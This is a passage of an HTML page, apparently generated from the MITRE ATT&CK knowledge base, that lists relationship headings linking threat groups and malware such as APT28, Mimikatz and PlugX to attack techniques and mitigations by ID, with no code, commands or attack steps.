<h3 id="_trap_mitigation_t1154_mitigates_trap_t1154"><a class="anchor" href="#_trap_mitigation_t1154_mitigates_trap_t1154"></a><a class="link" href="#_trap_mitigation_t1154_mitigates_trap_t1154">Trap Mitigation (T1154) mitigates Trap (T1154)</a></h3>
</div>
<div class="sect2">
<h3 id="_credentials_in_files_mitigation_t1081_mitigates_credentials_in_files_t1081"><a class="anchor" href="#_credentials_in_files_mitigation_t1081_mitigates_credentials_in_files_t1081"></a><a class="link" href="#_credentials_in_files_mitigation_t1081_mitigates_credentials_in_files_t1081">Credentials in Files Mitigation (T1081) mitigates Credentials in Files (T1081)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_commonly_used_port_t1043"><a class="anchor" href="#_bbsrat_s0127_uses_commonly_used_port_t1043"></a><a class="link" href="#_bbsrat_s0127_uses_commonly_used_port_t1043">BBSRAT (S0127) uses Commonly Used Port (T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161_uses_credentials_in_files_t1081"><a class="anchor" href="#_xagentosx_s0161_uses_credentials_in_files_t1081"></a><a class="link" href="#_xagentosx_s0161_uses_credentials_in_files_t1081">XAgentOSX (S0161) uses Credentials in Files (T1081)</a></h3>
</div>
<div class="sect2">
<h3 id="_sowbug_g0054_uses_network_share_discovery_t1135"><a class="anchor" href="#_sowbug_g0054_uses_network_share_discovery_t1135"></a><a class="link" href="#_sowbug_g0054_uses_network_share_discovery_t1135">Sowbug (G0054) uses Network Share Discovery (T1135)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_permission_groups_discovery_t1069"><a class="anchor" href="#_apt3_g0022_uses_permission_groups_discovery_t1069"></a><a class="link" href="#_apt3_g0022_uses_permission_groups_discovery_t1069">APT3 (G0022) uses Permission Groups Discovery (T1069)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_windows_management_instrumentation_t1047"><a class="anchor" href="#_deep_panda_g0009_uses_windows_management_instrumentation_t1047"></a><a class="link" href="#_deep_panda_g0009_uses_windows_management_instrumentation_t1047">Deep Panda (G0009) uses Windows Management Instrumentation (T1047)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_data_encrypted_t1022"><a class="anchor" href="#_duqu_s0038_uses_data_encrypted_t1022"></a><a class="link" href="#_duqu_s0038_uses_data_encrypted_t1022">Duqu (S0038) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_remote_desktop_protocol_t1076"><a class="anchor" href="#_menupass_g0045_uses_remote_desktop_protocol_t1076"></a><a class="link" href="#_menupass_g0045_uses_remote_desktop_protocol_t1076">menuPass (G0045) uses Remote Desktop Protocol (T1076)</a></h3>
</div>
<div class="sect2">
<h3 id="_dustysky_s0062_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_dustysky_s0062_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_dustysky_s0062_uses_file_and_directory_discovery_t1083">DustySky (S0062) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin7_g0046_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_fin7_g0046_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_fin7_g0046_uses_registry_run_keys_start_folder_t1060">FIN7 (G0046) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_deep_panda_g0009_uses_windows_admin_shares_t1077"><a class="anchor" href="#_deep_panda_g0009_uses_windows_admin_shares_t1077"></a><a class="link" href="#_deep_panda_g0009_uses_windows_admin_shares_t1077">Deep Panda (G0009) uses Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_janicab_s0163_uses_audio_capture_t1123"><a class="anchor" href="#_janicab_s0163_uses_audio_capture_t1123"></a><a class="link" href="#_janicab_s0163_uses_audio_capture_t1123">Janicab (S0163) uses Audio Capture (T1123)</a></h3>
</div>
<div class="sect2">
<h3 id="_jhuhugit_s0044_uses_file_deletion_t1107"><a class="anchor" href="#_jhuhugit_s0044_uses_file_deletion_t1107"></a><a class="link" href="#_jhuhugit_s0044_uses_file_deletion_t1107">JHUHUGIT (S0044) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_tinytyphon_s0131_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_tinytyphon_s0131_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_tinytyphon_s0131_uses_registry_run_keys_start_folder_t1060">TINYTYPHON (S0131) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_account_discovery_t1087"><a class="anchor" href="#_menupass_g0045_uses_account_discovery_t1087"></a><a class="link" href="#_menupass_g0045_uses_account_discovery_t1087">menuPass (G0045) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_dll_side_loading_t1073"><a class="anchor" href="#_bbsrat_s0127_uses_dll_side_loading_t1073"></a><a class="link" href="#_bbsrat_s0127_uses_dll_side_loading_t1073">BBSRAT (S0127) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_downdelph_s0134_uses_dll_search_order_hijacking_t1038"><a class="anchor" href="#_downdelph_s0134_uses_dll_search_order_hijacking_t1038"></a><a class="link" href="#_downdelph_s0134_uses_dll_search_order_hijacking_t1038">Downdelph (S0134) uses DLL Search Order Hijacking (T1038)</a></h3>
</div>
<div class="sect2">
<h3 id="_flipside_s0173_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_flipside_s0173_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_flipside_s0173_uses_standard_application_layer_protocol_t1071">FLIPSIDE (S0173) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_modify_existing_service_mitigation_t1031_mitigates_modify_existing_service_t1031"><a class="anchor" href="#_modify_existing_service_mitigation_t1031_mitigates_modify_existing_service_t1031"></a><a class="link" href="#_modify_existing_service_mitigation_t1031_mitigates_modify_existing_service_t1031">Modify Existing Service Mitigation (T1031) mitigates Modify Existing Service (T1031)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_ipconfig_s0100"><a class="anchor" href="#_admin_338_g0018_uses_ipconfig_s0100"></a><a class="link" href="#_admin_338_g0018_uses_ipconfig_s0100">admin@338 (G0018) uses ipconfig (S0100)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_credential_dumping_t1003"><a class="anchor" href="#_matroyshka_s0167_uses_credential_dumping_t1003"></a><a class="link" href="#_matroyshka_s0167_uses_credential_dumping_t1003">Matroyshka (S0167) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_cosmicduke_s0050_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_cosmicduke_s0050_uses_custom_cryptographic_protocol_t1024">CosmicDuke (S0050) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_gh0st_s0032_uses_command_line_interface_t1059"><a class="anchor" href="#_gh0st_s0032_uses_command_line_interface_t1059"></a><a class="link" href="#_gh0st_s0032_uses_command_line_interface_t1059">gh0st (S0032) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_usbstealer_s0136"><a class="anchor" href="#_apt28_g0007_uses_usbstealer_s0136"></a><a class="link" href="#_apt28_g0007_uses_usbstealer_s0136">APT28 (G0007) uses USBStealer (S0136)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_standard_cryptographic_protocol_t1032"><a class="anchor" href="#_moonwind_s0149_uses_standard_cryptographic_protocol_t1032"></a><a class="link" href="#_moonwind_s0149_uses_standard_cryptographic_protocol_t1032">MoonWind (S0149) uses Standard Cryptographic Protocol (T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_redleaves_s0153_uses_system_owner_user_discovery_t1033"><a class="anchor" href="#_redleaves_s0153_uses_system_owner_user_discovery_t1033"></a><a class="link" href="#_redleaves_s0153_uses_system_owner_user_discovery_t1033">RedLeaves (S0153) uses System Owner/User Discovery (T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_downdelph_s0134_uses_remote_file_copy_t1105"><a class="anchor" href="#_downdelph_s0134_uses_remote_file_copy_t1105"></a><a class="link" href="#_downdelph_s0134_uses_remote_file_copy_t1105">Downdelph (S0134) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_pittytiger_g0011_uses_poisonivy_s0012"><a class="anchor" href="#_pittytiger_g0011_uses_poisonivy_s0012"></a><a class="link" href="#_pittytiger_g0011_uses_poisonivy_s0012">PittyTiger (G0011) uses PoisonIvy (S0012)</a></h3>
</div>
<div class="sect2">
<h3 id="_flashflood_s0036_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_flashflood_s0036_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_flashflood_s0036_uses_registry_run_keys_start_folder_t1060">FLASHFLOOD (S0036) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_hidden_files_and_directories_mitigation_t1158_mitigates_hidden_files_and_directories_t1158"><a class="anchor" href="#_hidden_files_and_directories_mitigation_t1158_mitigates_hidden_files_and_directories_t1158"></a><a class="link" href="#_hidden_files_and_directories_mitigation_t1158_mitigates_hidden_files_and_directories_t1158">Hidden Files and Directories Mitigation (T1158) mitigates Hidden Files and Directories (T1158)</a></h3>
</div>
<div class="sect2">
<h3 id="_llmnr_nbt_ns_poisoning_mitigation_t1171_mitigates_llmnr_nbt_ns_poisoning_t1171"><a class="anchor" href="#_llmnr_nbt_ns_poisoning_mitigation_t1171_mitigates_llmnr_nbt_ns_poisoning_t1171"></a><a class="link" href="#_llmnr_nbt_ns_poisoning_mitigation_t1171_mitigates_llmnr_nbt_ns_poisoning_t1171">LLMNR/NBT-NS Poisoning Mitigation (T1171) mitigates LLMNR/NBT-NS Poisoning (T1171)</a></h3>
</div>
<div class="sect2">
<h3 id="_chopstick_s0023_uses_remote_file_copy_t1105"><a class="anchor" href="#_chopstick_s0023_uses_remote_file_copy_t1105"></a><a class="link" href="#_chopstick_s0023_uses_remote_file_copy_t1105">CHOPSTICK (S0023) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_admin_338_g0018_uses_poisonivy_s0012"><a class="anchor" href="#_admin_338_g0018_uses_poisonivy_s0012"></a><a class="link" href="#_admin_338_g0018_uses_poisonivy_s0012">admin@338 (G0018) uses PoisonIvy (S0012)</a></h3>
</div>
<div class="sect2">
<h3 id="_cozycar_s0046_uses_masquerading_t1036"><a class="anchor" href="#_cozycar_s0046_uses_masquerading_t1036"></a><a class="link" href="#_cozycar_s0046_uses_masquerading_t1036">CozyCar (S0046) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_mimikatz_s0002_uses_credentials_in_files_t1081"><a class="anchor" href="#_mimikatz_s0002_uses_credentials_in_files_t1081"></a><a class="link" href="#_mimikatz_s0002_uses_credentials_in_files_t1081">Mimikatz (S0002) uses Credentials in Files (T1081)</a></h3>
</div>
<div class="sect2">
<h3 id="_spaceship_s0035_uses_data_encrypted_t1022"><a class="anchor" href="#_spaceship_s0035_uses_data_encrypted_t1022"></a><a class="link" href="#_spaceship_s0035_uses_data_encrypted_t1022">SPACESHIP (S0035) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_stealth_falcon_g0038_uses_credential_dumping_t1003"><a class="anchor" href="#_stealth_falcon_g0038_uses_credential_dumping_t1003"></a><a class="link" href="#_stealth_falcon_g0038_uses_credential_dumping_t1003">Stealth Falcon (G0038) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_file_deletion_t1107"><a class="anchor" href="#_powerduke_s0139_uses_file_deletion_t1107"></a><a class="link" href="#_powerduke_s0139_uses_file_deletion_t1107">PowerDuke (S0139) uses File Deletion (T1107)</a></h3>
</div>
<div class="sect2">
<h3 id="_matroyshka_s0167_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_matroyshka_s0167_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_matroyshka_s0167_uses_standard_application_layer_protocol_t1071">Matroyshka (S0167) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_new_service_t1050"><a class="anchor" href="#_blackenergy_s0089_uses_new_service_t1050"></a><a class="link" href="#_blackenergy_s0089_uses_new_service_t1050">BlackEnergy (S0089) uses New Service (T1050)</a></h3>
</div>
<div class="sect2">
<h3 id="_powruner_s0184_uses_system_network_connections_discovery_t1049"><a class="anchor" href="#_powruner_s0184_uses_system_network_connections_discovery_t1049"></a><a class="link" href="#_powruner_s0184_uses_system_network_connections_discovery_t1049">POWRUNER (S0184) uses System Network Connections Discovery (T1049)</a></h3>
</div>
<div class="sect2">
<h3 id="_turla_g0010_uses_tasklist_s0057"><a class="anchor" href="#_turla_g0010_uses_tasklist_s0057"></a><a class="link" href="#_turla_g0010_uses_tasklist_s0057">Turla (G0010) uses Tasklist (S0057)</a></h3>
</div>
<div class="sect2">
<h3 id="_remsec_s0125_uses_account_discovery_t1087"><a class="anchor" href="#_remsec_s0125_uses_account_discovery_t1087"></a><a class="link" href="#_remsec_s0125_uses_account_discovery_t1087">Remsec (S0125) uses Account Discovery (T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_elise_s0081_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_elise_s0081_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_elise_s0081_uses_obfuscated_files_or_information_t1027">Elise (S0081) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_naikon_g0019_uses_ping_s0097"><a class="anchor" href="#_naikon_g0019_uses_ping_s0097"></a><a class="link" href="#_naikon_g0019_uses_ping_s0097">Naikon (G0019) uses Ping (S0097)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_screen_capture_t1113"><a class="anchor" href="#_blackenergy_s0089_uses_screen_capture_t1113"></a><a class="link" href="#_blackenergy_s0089_uses_screen_capture_t1113">BlackEnergy (S0089) uses Screen Capture (T1113)</a></h3>
</div>
<div class="sect2">
<h3 id="_powerduke_s0139_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_powerduke_s0139_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_powerduke_s0139_uses_file_and_directory_discovery_t1083">PowerDuke (S0139) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_graphical_user_interface_mitigation_t1061_mitigates_graphical_user_interface_t1061"><a class="anchor" href="#_graphical_user_interface_mitigation_t1061_mitigates_graphical_user_interface_t1061"></a><a class="link" href="#_graphical_user_interface_mitigation_t1061_mitigates_graphical_user_interface_t1061">Graphical User Interface Mitigation (T1061) mitigates Graphical User Interface (T1061)</a></h3>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027_uses_data_transfer_size_limits_t1030"><a class="anchor" href="#_threat_group_3390_g0027_uses_data_transfer_size_limits_t1030"></a><a class="link" href="#_threat_group_3390_g0027_uses_data_transfer_size_limits_t1030">Threat Group-3390 (G0027) uses Data Transfer Size Limits (T1030)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin6_g0037_uses_windows_credential_editor_s0005"><a class="anchor" href="#_fin6_g0037_uses_windows_credential_editor_s0005"></a><a class="link" href="#_fin6_g0037_uses_windows_credential_editor_s0005">FIN6 (G0037) uses Windows Credential Editor (S0005)</a></h3>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_hi_zor_s0087_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_hi_zor_s0087_uses_registry_run_keys_start_folder_t1060">Hi-Zor (S0087) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_dragonfly_g0035_uses_brute_force_t1110"><a class="anchor" href="#_dragonfly_g0035_uses_brute_force_t1110"></a><a class="link" href="#_dragonfly_g0035_uses_brute_force_t1110">Dragonfly (G0035) uses Brute Force (T1110)</a></h3>
</div>
<div class="sect2">
<h3 id="_moonwind_s0149_uses_file_and_directory_discovery_t1083"><a class="anchor" href="#_moonwind_s0149_uses_file_and_directory_discovery_t1083"></a><a class="link" href="#_moonwind_s0149_uses_file_and_directory_discovery_t1083">MoonWind (S0149) uses File and Directory Discovery (T1083)</a></h3>
</div>
<div class="sect2">
<h3 id="_4h_rat_s0065_uses_command_line_interface_t1059"><a class="anchor" href="#_4h_rat_s0065_uses_command_line_interface_t1059"></a><a class="link" href="#_4h_rat_s0065_uses_command_line_interface_t1059">4H RAT (S0065) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_volgmer_s0180_uses_command_line_interface_t1059"><a class="anchor" href="#_volgmer_s0180_uses_command_line_interface_t1059"></a><a class="link" href="#_volgmer_s0180_uses_command_line_interface_t1059">Volgmer (S0180) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_menupass_g0045_uses_dll_side_loading_t1073"><a class="anchor" href="#_menupass_g0045_uses_dll_side_loading_t1073"></a><a class="link" href="#_menupass_g0045_uses_dll_side_loading_t1073">menuPass (G0045) uses DLL Side-Loading (T1073)</a></h3>
</div>
<div class="sect2">
<h3 id="_oldbait_s0138_uses_masquerading_t1036"><a class="anchor" href="#_oldbait_s0138_uses_masquerading_t1036"></a><a class="link" href="#_oldbait_s0138_uses_masquerading_t1036">OLDBAIT (S0138) uses Masquerading (T1036)</a></h3>
</div>
<div class="sect2">
<h3 id="_httpbrowser_s0070_uses_obfuscated_files_or_information_t1027"><a class="anchor" href="#_httpbrowser_s0070_uses_obfuscated_files_or_information_t1027"></a><a class="link" href="#_httpbrowser_s0070_uses_obfuscated_files_or_information_t1027">HTTPBrowser (S0070) uses Obfuscated Files or Information (T1027)</a></h3>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_gamaredon_group_g0047_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_gamaredon_group_g0047_uses_peripheral_device_discovery_t1120">Gamaredon Group (G0047) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_agent_btz_s0092_uses_remote_file_copy_t1105"><a class="anchor" href="#_agent_btz_s0092_uses_remote_file_copy_t1105"></a><a class="link" href="#_agent_btz_s0092_uses_remote_file_copy_t1105">Agent.btz (S0092) uses Remote File Copy (T1105)</a></h3>
</div>
<div class="sect2">
<h3 id="_bash_profile_and_bashrc_mitigation_t1156_mitigates_bash_profile_and_bashrc_t1156"><a class="anchor" href="#_bash_profile_and_bashrc_mitigation_t1156_mitigates_bash_profile_and_bashrc_t1156"></a><a class="link" href="#_bash_profile_and_bashrc_mitigation_t1156_mitigates_bash_profile_and_bashrc_t1156">.bash_profile and .bashrc Mitigation (T1156) mitigates .bash_profile and .bashrc (T1156)</a></h3>
</div>
<div class="sect2">
<h3 id="_felismus_s0171_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_felismus_s0171_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_felismus_s0171_uses_standard_application_layer_protocol_t1071">Felismus (S0171) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_usbstealer_s0136_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_usbstealer_s0136_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_usbstealer_s0136_uses_peripheral_device_discovery_t1120">USBStealer (S0136) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_bbsrat_s0127_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_bbsrat_s0127_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_bbsrat_s0127_uses_registry_run_keys_start_folder_t1060">BBSRAT (S0127) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_system_network_configuration_discovery_t1016"><a class="anchor" href="#_apt3_g0022_uses_system_network_configuration_discovery_t1016"></a><a class="link" href="#_apt3_g0022_uses_system_network_configuration_discovery_t1016">APT3 (G0022) uses System Network Configuration Discovery (T1016)</a></h3>
</div>
<div class="sect2">
<h3 id="_snugride_s0159_uses_command_line_interface_t1059"><a class="anchor" href="#_snugride_s0159_uses_command_line_interface_t1059"></a><a class="link" href="#_snugride_s0159_uses_command_line_interface_t1059">SNUGRIDE (S0159) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_duqu_s0038_uses_data_compressed_t1002"><a class="anchor" href="#_duqu_s0038_uses_data_compressed_t1002"></a><a class="link" href="#_duqu_s0038_uses_data_compressed_t1002">Duqu (S0038) uses Data Compressed (T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_kasidet_s0088_uses_command_line_interface_t1059"><a class="anchor" href="#_kasidet_s0088_uses_command_line_interface_t1059"></a><a class="link" href="#_kasidet_s0088_uses_command_line_interface_t1059">Kasidet (S0088) uses Command-Line Interface (T1059)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt30_g0013_uses_flashflood_s0036"><a class="anchor" href="#_apt30_g0013_uses_flashflood_s0036"></a><a class="link" href="#_apt30_g0013_uses_flashflood_s0036">APT30 (G0013) uses FLASHFLOOD (S0036)</a></h3>
</div>
<div class="sect2">
<h3 id="_reaver_s0172_uses_data_encrypted_t1022"><a class="anchor" href="#_reaver_s0172_uses_data_encrypted_t1022"></a><a class="link" href="#_reaver_s0172_uses_data_encrypted_t1022">Reaver (S0172) uses Data Encrypted (T1022)</a></h3>
</div>
<div class="sect2">
<h3 id="_create_account_mitigation_t1136_mitigates_create_account_t1136"><a class="anchor" href="#_create_account_mitigation_t1136_mitigates_create_account_t1136"></a><a class="link" href="#_create_account_mitigation_t1136_mitigates_create_account_t1136">Create Account Mitigation (T1136) mitigates Create Account (T1136)</a></h3>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_patchwork_g0040_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_patchwork_g0040_uses_registry_run_keys_start_folder_t1060">Patchwork (G0040) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_charming_kitten_g0058_uses_downpaper_s0186"><a class="anchor" href="#_charming_kitten_g0058_uses_downpaper_s0186"></a><a class="link" href="#_charming_kitten_g0058_uses_downpaper_s0186">Charming Kitten (G0058) uses DownPaper (S0186)</a></h3>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089_uses_peripheral_device_discovery_t1120"><a class="anchor" href="#_blackenergy_s0089_uses_peripheral_device_discovery_t1120"></a><a class="link" href="#_blackenergy_s0089_uses_peripheral_device_discovery_t1120">BlackEnergy (S0089) uses Peripheral Device Discovery (T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_trojan_mebromi_s0001_uses_system_firmware_t1019"><a class="anchor" href="#_trojan_mebromi_s0001_uses_system_firmware_t1019"></a><a class="link" href="#_trojan_mebromi_s0001_uses_system_firmware_t1019">Trojan.Mebromi (S0001) uses System Firmware (T1019)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_apt3_g0022_uses_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_apt3_g0022_uses_registry_run_keys_start_folder_t1060">APT3 (G0022) uses Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050_uses_credential_dumping_t1003"><a class="anchor" href="#_cosmicduke_s0050_uses_credential_dumping_t1003"></a><a class="link" href="#_cosmicduke_s0050_uses_credential_dumping_t1003">CosmicDuke (S0050) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_windows_admin_shares_mitigation_t1077_mitigates_windows_admin_shares_t1077"><a class="anchor" href="#_windows_admin_shares_mitigation_t1077_mitigates_windows_admin_shares_t1077"></a><a class="link" href="#_windows_admin_shares_mitigation_t1077_mitigates_windows_admin_shares_t1077">Windows Admin Shares Mitigation (T1077) mitigates Windows Admin Shares (T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049_uses_process_discovery_t1057"><a class="anchor" href="#_oilrig_g0049_uses_process_discovery_t1057"></a><a class="link" href="#_oilrig_g0049_uses_process_discovery_t1057">OilRig (G0049) uses Process Discovery (T1057)</a></h3>
</div>
<div class="sect2">
<h3 id="_registry_run_keys_start_folder_mitigation_t1060_mitigates_registry_run_keys_start_folder_t1060"><a class="anchor" href="#_registry_run_keys_start_folder_mitigation_t1060_mitigates_registry_run_keys_start_folder_t1060"></a><a class="link" href="#_registry_run_keys_start_folder_mitigation_t1060_mitigates_registry_run_keys_start_folder_t1060">Registry Run Keys / Start Folder Mitigation (T1060) mitigates Registry Run Keys / Start Folder (T1060)</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_s0013_uses_web_service_t1102"><a class="anchor" href="#_plugx_s0013_uses_web_service_t1102"></a><a class="link" href="#_plugx_s0013_uses_web_service_t1102">PlugX (S0013) uses Web Service (T1102)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt3_g0022_uses_valid_accounts_t1078"><a class="anchor" href="#_apt3_g0022_uses_valid_accounts_t1078"></a><a class="link" href="#_apt3_g0022_uses_valid_accounts_t1078">APT3 (G0022) uses Valid Accounts (T1078)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin10_g0051_uses_scheduled_task_t1053"><a class="anchor" href="#_fin10_g0051_uses_scheduled_task_t1053"></a><a class="link" href="#_fin10_g0051_uses_scheduled_task_t1053">FIN10 (G0051) uses Scheduled Task (T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_spaceship_s0035_uses_data_staged_t1074"><a class="anchor" href="#_spaceship_s0035_uses_data_staged_t1074"></a><a class="link" href="#_spaceship_s0035_uses_data_staged_t1074">SPACESHIP (S0035) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_pinchduke_s0048_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_pinchduke_s0048_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_pinchduke_s0048_uses_standard_application_layer_protocol_t1071">PinchDuke (S0048) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_copykittens_g0052_uses_code_signing_t1116"><a class="anchor" href="#_copykittens_g0052_uses_code_signing_t1116"></a><a class="link" href="#_copykittens_g0052_uses_code_signing_t1116">CopyKittens (G0052) uses Code Signing (T1116)</a></h3>
</div>
<div class="sect2">
<h3 id="_3para_rat_s0066_uses_redundant_access_t1108"><a class="anchor" href="#_3para_rat_s0066_uses_redundant_access_t1108"></a><a class="link" href="#_3para_rat_s0066_uses_redundant_access_t1108">3PARA RAT (S0066) uses Redundant Access (T1108)</a></h3>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047_uses_standard_application_layer_protocol_t1071"><a class="anchor" href="#_gamaredon_group_g0047_uses_standard_application_layer_protocol_t1071"></a><a class="link" href="#_gamaredon_group_g0047_uses_standard_application_layer_protocol_t1071">Gamaredon Group (G0047) uses Standard Application Layer Protocol (T1071)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_windows_credential_editor_s0005"><a class="anchor" href="#_fin5_g0053_uses_windows_credential_editor_s0005"></a><a class="link" href="#_fin5_g0053_uses_windows_credential_editor_s0005">FIN5 (G0053) uses Windows Credential Editor (S0005)</a></h3>
</div>
<div class="sect2">
<h3 id="_sakula_s0074_uses_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_sakula_s0074_uses_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_sakula_s0074_uses_custom_cryptographic_protocol_t1024">Sakula (S0074) uses Custom Cryptographic Protocol (T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_credential_dumping_t1003"><a class="anchor" href="#_apt28_g0007_uses_credential_dumping_t1003"></a><a class="link" href="#_apt28_g0007_uses_credential_dumping_t1003">APT28 (G0007) uses Credential Dumping (T1003)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_calendar_s0025"><a class="anchor" href="#_apt1_g0006_uses_calendar_s0025"></a><a class="link" href="#_apt1_g0006_uses_calendar_s0025">APT1 (G0006) uses CALENDAR (S0025)</a></h3>
</div>
<div class="sect2">
<h3 id="_fin5_g0053_uses_data_staged_t1074"><a class="anchor" href="#_fin5_g0053_uses_data_staged_t1074"></a><a class="link" href="#_fin5_g0053_uses_data_staged_t1074">FIN5 (G0053) uses Data Staged (T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_t9000_s0098_uses_video_capture_t1125"><a class="anchor" href="#_t9000_s0098_uses_video_capture_t1125"></a><a class="link" href="#_t9000_s0098_uses_video_capture_t1125">T9000 (S0098) uses Video Capture (T1125)</a></h3>
</div>
<div class="sect2">
<h3 id="_cherry_picker_s0107_uses_appinit_dlls_t1103"><a class="anchor" href="#_cherry_picker_s0107_uses_appinit_dlls_t1103"></a><a class="link" href="#_cherry_picker_s0107_uses_appinit_dlls_t1103">Cherry Picker (S0107) uses AppInit DLLs (T1103)</a></h3>
</div>
<div class="sect2">
